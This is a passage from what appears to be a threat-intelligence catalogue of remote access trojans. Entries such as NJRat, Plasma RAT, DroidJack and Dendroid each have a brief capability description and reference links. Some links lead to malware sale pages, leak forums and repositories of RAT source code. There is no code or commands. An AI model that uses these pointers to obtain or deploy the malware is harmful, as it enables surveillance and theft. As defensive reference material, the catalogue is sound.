<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.infosecurity-magazine.com/blogs/the-dark-rat/">https://www.infosecurity-magazine.com/blogs/the-dark-rat/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://darkratphp.blogspot.lu/">http://darkratphp.blogspot.lu/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_greame"><a class="anchor" href="#_greame"></a><a class="link" href="#_greame">Greame</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2194. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://sites.google.com/site/greymecompany/greame-rat-project">https://sites.google.com/site/greymecompany/greame-rat-project</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hawkeye"><a class="anchor" href="#_hawkeye"></a><a class="link" href="#_hawkeye">HawkEye</a></h3>
<div class="paragraph">
<p>HawkEye is a popular RAT that can be used as a keylogger, it is also able to identify login events and record the destination, username, and password.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2195. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://securityaffairs.co/wordpress/54837/hacking/one-stop-shop-hacking.html">http://securityaffairs.co/wordpress/54837/hacking/one-stop-shop-hacking.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jrat"><a class="anchor" href="#_jrat"></a><a class="link" href="#_jrat">jRAT</a></h3>
<div class="paragraph">
<p>jRAT is the cross-platform remote administrator tool that is coded in Java, Because its coded in Java it gives jRAT possibilities to run on all operation systems, Which includes Windows, Mac OSX and Linux distributions.</p>
</div>
<div class="paragraph">
<p>jRAT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>JacksBot</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2196. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rekings.com/shop/jrat/">https://www.rekings.com/shop/jrat/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jspy"><a class="anchor" href="#_jspy"></a><a class="link" href="#_jspy">jSpy</a></h3>
<div class="paragraph">
<p>jSpy is a Java RAT.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2197. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://leakforums.net/thread-479505">https://leakforums.net/thread-479505</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_luxnet"><a class="anchor" href="#_luxnet"></a><a class="link" href="#_luxnet">LuxNET</a></h3>
<div class="paragraph">
<p>Just saying that this is a very badly coded RAT by the biggest skid in this world, that is XilluX. The connection is very unstable, the GUI is always flickering because of the bad Multi-Threading and many more bugs.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2198. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://leakforums.net/thread-284656">https://leakforums.net/thread-284656</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_njrat"><a class="anchor" href="#_njrat"></a><a class="link" href="#_njrat">NJRat</a></h3>
<div class="paragraph">
<p>NJRat is a remote access trojan (RAT), first spotted in June 2013 with samples dating back to November 2012. It was developed and is supported by Arabic speakers and mainly used by cybercrime groups against targets in the Middle East. In addition to targeting some governments in the region, the trojan is used to control botnets and conduct other typical cybercrime activity. It infects victims via phishing attacks and drive-by downloads and propagates through infected USB keys or networked drives. It can download and execute additional malware, execute shell commands, read and write registry keys, capture screenshots, log keystrokes, and spy on webcams.</p>
</div>
<div class="paragraph">
<p>NJRat is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Njw0rm</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2199. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cyber.nj.gov/threat-profiles/trojan-variants/njrat">https://www.cyber.nj.gov/threat-profiles/trojan-variants/njrat</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pandora"><a class="anchor" href="#_pandora"></a><a class="link" href="#_pandora">Pandora</a></h3>
<div class="paragraph">
<p>Remote administrator tool that has been developed for Windows operation system. With advanced features and stable structure, Pandoras structure is based on advanced client / server architecture. was configured using modern technology.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2200. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rekings.com/pandora-rat-2-2/">https://www.rekings.com/pandora-rat-2-2/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_predator_pain"><a class="anchor" href="#_predator_pain"></a><a class="link" href="#_predator_pain">Predator Pain</a></h3>
<div class="paragraph">
<p>Unlike Zeus, Predator Pain and Limitless are relatively simple keyloggers. They indiscriminately steal web credentials and mail client credentials, as well as capturing keystrokes and screen captures. The output is human readable, which is good if you are managing a few infected machines only, but the design doesnt scale well when there are a lot of infected machines and logs involved.</p>
</div>
<div class="paragraph">
<p>Predator Pain is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PredatorPain</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2201. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/predator-pain-and-limitless-behind-the-fraud/">http://blog.trendmicro.com/trendlabs-security-intelligence/predator-pain-and-limitless-behind-the-fraud/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-predator-pain-and-limitless.pdf">https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-predator-pain-and-limitless.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_punisher_rat"><a class="anchor" href="#_punisher_rat"></a><a class="link" href="#_punisher_rat">Punisher RAT</a></h3>
<div class="paragraph">
<p>Remote administration tool</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2202. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://punisher-rat.blogspot.lu/">http://punisher-rat.blogspot.lu/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spygate"><a class="anchor" href="#_spygate"></a><a class="link" href="#_spygate">SpyGate</a></h3>
<div class="paragraph">
<p>This is tool that allow you to control your computer form anywhere in world with full support to unicode language.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2203. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rekings.com/spygate-rat-3-2/">https://www.rekings.com/spygate-rat-3-2/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/attacksignatures/detail.jsp%3Fasid%3D27950">https://www.symantec.com/security_response/attacksignatures/detail.jsp%3Fasid%3D27950</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://spygate-rat.blogspot.lu/">http://spygate-rat.blogspot.lu/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_small_net"><a class="anchor" href="#_small_net"></a><a class="link" href="#_small_net">Small-Net</a></h3>
<div class="paragraph">
<p>RAT</p>
</div>
<div class="paragraph">
<p>Small-Net is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SmallNet</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2204. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://small-net-rat.blogspot.lu/">http://small-net-rat.blogspot.lu/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vantom"><a class="anchor" href="#_vantom"></a><a class="link" href="#_vantom">Vantom</a></h3>
<div class="paragraph">
<p>Vantom is a free RAT with good option and very stable.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2205. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rekings.com/vantom-rat/">https://www.rekings.com/vantom-rat/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xena"><a class="anchor" href="#_xena"></a><a class="link" href="#_xena">Xena</a></h3>
<div class="paragraph">
<p>Xena RAT is a fully-functional, stable, state-of-the-art RAT, coded in a native language called Delphi, it has almost no dependencies.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2206. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://leakforums.net/thread-497480">https://leakforums.net/thread-497480</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xtremerat"><a class="anchor" href="#_xtremerat"></a><a class="link" href="#_xtremerat">XtremeRAT</a></h3>
<div class="paragraph">
<p>This malware has been used in targeted attacks as well as traditional cybercrime. During our investigation we found that the majority of XtremeRAT activity is associated with spam campaigns that typically distribute Zeus variants and other banking-focused malware.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2207. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html">https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_netwire"><a class="anchor" href="#_netwire"></a><a class="link" href="#_netwire">Netwire</a></h3>
<div class="paragraph">
<p>NetWire has a built-in keylogger that can capture inputs from peripheral devices such as USB card readers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2208. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data">https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gh0st_rat"><a class="anchor" href="#_gh0st_rat"></a><a class="link" href="#_gh0st_rat">Gh0st RAT</a></h3>
<div class="paragraph">
<p>Gh0st RAT is a Trojan horse for the Windows platform that the operators of GhostNet used to hack into some of the most sensitive computer networks on Earth. It is a cyber spying computer program. .</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2209. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.volexity.com/blog/2017/03/23/have-you-been-haunted-by-the-gh0st-rat-today/">https://www.volexity.com/blog/2017/03/23/have-you-been-haunted-by-the-gh0st-rat-today/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_plasma_rat"><a class="anchor" href="#_plasma_rat"></a><a class="link" href="#_plasma_rat">Plasma RAT</a></h3>
<div class="paragraph">
<p>Plasma RATs stub is fairly advanced, having many robust features. Some of the features include botkilling, Cryptocurrencies Mining (CPU and GPU), persistence, anti-analysis, torrent seeding, AV killer, 7 DDoS methods and a keylogger. The RAT is coded in VB.Net. There is also a Botnet version of it (Plasma HTTP), which is pretty similar to the RAT version.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2210. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.zunzutech.com/blog/security/analysis-of-plasma-rats-source-code/">http://www.zunzutech.com/blog/security/analysis-of-plasma-rats-source-code/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_babylon"><a class="anchor" href="#_babylon"></a><a class="link" href="#_babylon">Babylon</a></h3>
<div class="paragraph">
<p>Babylon is a highly advanced remote administration tool with no dependencies. The server is developed in C++ which is an ideal language for high performance and the client is developed in C#(.Net Framework 4.5)</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2211. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rekings.com/babylon-rat/">https://www.rekings.com/babylon-rat/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_imminent_monitor"><a class="anchor" href="#_imminent_monitor"></a><a class="link" href="#_imminent_monitor">Imminent Monitor</a></h3>
<div class="paragraph">
<p>RAT</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2212. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.imminentmethods.info/">http://www.imminentmethods.info/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_droidjack"><a class="anchor" href="#_droidjack"></a><a class="link" href="#_droidjack">DroidJack</a></h3>
<div class="paragraph">
<p>DroidJack is a RAT (Remote Access Trojan/Remote Administration Tool) nature of remote accessing, monitoring and managing tool (Java based) for Android mobile OS. You can use it to perform a complete remote control to any Android devices infected with DroidJack through your PC. It comes with powerful function and user-friendly operation even allows attackers to fully take over the mobile phone and steal, record the victims private data wilfully.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2213. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://droidjack.net/">http://droidjack.net/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_quasar_rat"><a class="anchor" href="#_quasar_rat"></a><a class="link" href="#_quasar_rat">Quasar RAT</a></h3>
<div class="paragraph">
<p>Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2214. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/quasar/QuasarRAT">https://github.com/quasar/QuasarRAT</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dendroid"><a class="anchor" href="#_dendroid"></a><a class="link" href="#_dendroid">Dendroid</a></h3>
<div class="paragraph">
<p>Dendroid is malware that affects Android OS and targets the mobile platform. It was first discovered in early of 2014 by Symantec and appeared in the underground for sale for $300. Some things were noted in Dendroid, such as being able to hide from emulators at the time. When first discovered in 2014 it was one of the most sophisticated Android remote administration tools known at that time. It was one of the first Trojan applications to get past Google&#8217;s Bouncer and caused researchers to warn about it being easier to create Android malware due to it. It also seems to have follow in the footsteps of Zeus and SpyEye by having simple-to-use command and control panels. The code appeared to be leaked somewhere around 2014. It was noted that an apk binder was included in the leak, which provided a simple way to bind Dendroid to legitimate applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2215. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/qqshow/dendroid">https://github.com/qqshow/dendroid</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/nyx0/Dendroid">https://github.com/nyx0/Dendroid</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ratty"><a class="anchor" href="#_ratty"></a><a class="link" href="#_ratty">Ratty</a></h3>
<div class="paragraph">
<p>A Java R.A.T. program</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2216. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/shotskeber/Ratty">https://github.com/shotskeber/Ratty</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ratron"><a class="anchor" href="#_ratron"></a><a class="link" href="#_ratron">RaTRon</a></h3>
<div class="paragraph">
<p>Java RAT</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2217. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://level23hacktools.com/forum/showthread.php?t=27971">http://level23hacktools.com/forum/showthread.php?t=27971</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://leakforums.net/thread-405562?tid=405562&amp;&amp;pq=1">https://leakforums.net/thread-405562?tid=405562&amp;&amp;pq=1</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_arabian_attacker_rat"><a class="anchor" href="#_arabian_attacker_rat"></a><a class="link" href="#_arabian_attacker_rat">Arabian-Attacker RAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2218. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://arabian-attacker.software.informer.com/">http://arabian-attacker.software.informer.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_androrat"><a class="anchor" href="#_androrat"></a><a class="link" href="#_androrat">Androrat</a></h3>
<div class="paragraph">
<p>Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2219. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://latesthackingnews.com/2015/05/31/how-to-hack-android-phones-with-androrat/">https://latesthackingnews.com/2015/05/31/how-to-hack-android-phones-with-androrat/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/wszf/androrat">https://github.com/wszf/androrat</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adzok"><a class="anchor" href="#_adzok"></a><a class="link" href="#_adzok">Adzok</a></h3>
<div class="paragraph">
<p>Remote Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2220. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://adzok.com/">http://adzok.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_schwarze_sonne_rat"><a class="anchor" href="#_schwarze_sonne_rat"></a><a class="link" href="#_schwarze_sonne_rat">Schwarze-Sonne-RAT</a></h3>
<div class="paragraph">
<p>Schwarze-Sonne-RAT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SS-RAT</p>
</li>
<li>
<p>Schwarze Sonne</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2221. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/mwsrc/Schwarze-Sonne-RAT">https://github.com/mwsrc/Schwarze-Sonne-RAT</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cyber_eye_rat"><a class="anchor" href="#_cyber_eye_rat"></a><a class="link" href="#_cyber_eye_rat">Cyber Eye RAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2222. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.indetectables.net/viewtopic.php?t=24245">https://www.indetectables.net/viewtopic.php?t=24245</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_batch_net"><a class="anchor" href="#_batch_net"></a><a class="link" href="#_batch_net">Batch NET</a></h3>
</div>
<div class="sect2">
<h3 id="_rwx_rat"><a class="anchor" href="#_rwx_rat"></a><a class="link" href="#_rwx_rat">RWX RAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2223. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://leakforums.net/thread-530663">https://leakforums.net/thread-530663</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spynet"><a class="anchor" href="#_spynet"></a><a class="link" href="#_spynet">Spynet</a></h3>
<div class="paragraph">
<p>Spy-Net is a software that allow you to control any computer in world using Windows Operating System.He is back using new functions and good options to give you full control of your remote computer.Stable and fast, this software offer to you a good interface, creating a easy way to use all his functions</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2224. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://spynet-rat-officiel.blogspot.lu/">http://spynet-rat-officiel.blogspot.lu/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ctos"><a class="anchor" href="#_ctos"></a><a class="link" href="#_ctos">CTOS</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2225. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://leakforums.net/thread-559871">https://leakforums.net/thread-559871</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_virus_rat"><a class="anchor" href="#_virus_rat"></a><a class="link" href="#_virus_rat">Virus RAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2226. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/mwsrc/Virus-RAT-v8.0-Beta">https://github.com/mwsrc/Virus-RAT-v8.0-Beta</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_atelier_web_remote_commander"><a class="anchor" href="#_atelier_web_remote_commander"></a><a class="link" href="#_atelier_web_remote_commander">Atelier Web Remote Commander</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2227. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.atelierweb.com/products/">http://www.atelierweb.com/products/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_drat"><a class="anchor" href="#_drat"></a><a class="link" href="#_drat">drat</a></h3>
<div class="paragraph">
<p>A distributed, parallelized (Map Reduce) wrapper around Apache™ RAT to allow it to complete on large code repositories of multiple file types where Apache™ RAT hangs forev</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2228. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/chrismattmann/drat">https://github.com/chrismattmann/drat</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mosucker"><a class="anchor" href="#_mosucker"></a><a class="link" href="#_mosucker">MoSucker</a></h3>
<div class="paragraph">
<p>MoSucker is a powerful backdoor - hacker&#8217;s remote access tool.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2229. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/v-descs/mosuck.shtml">https://www.f-secure.com/v-descs/mosuck.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_theef"><a class="anchor" href="#_theef"></a><a class="link" href="#_theef">Theef</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2230. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.grayhatforum.org/thread-4373-post-5213.html#pid5213">http://www.grayhatforum.org/thread-4373-post-5213.html#pid5213</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.spy-emergency.com/research/T/Theef_Download_Creator.html">http://www.spy-emergency.com/research/T/Theef_Download_Creator.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.spy-emergency.com/research/T/Theef.html">http://www.spy-emergency.com/research/T/Theef.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_prorat"><a class="anchor" href="#_prorat"></a><a class="link" href="#_prorat">ProRat</a></h3>
<div class="paragraph">
<p>ProRat is a Microsoft Windows based backdoor trojan, more commonly known as a Remote Administration Tool. As with other trojan horses it uses a client and server. ProRat opens a port on the computer which allows the client to perform numerous operations on the server (the machine being controlled).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2231. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
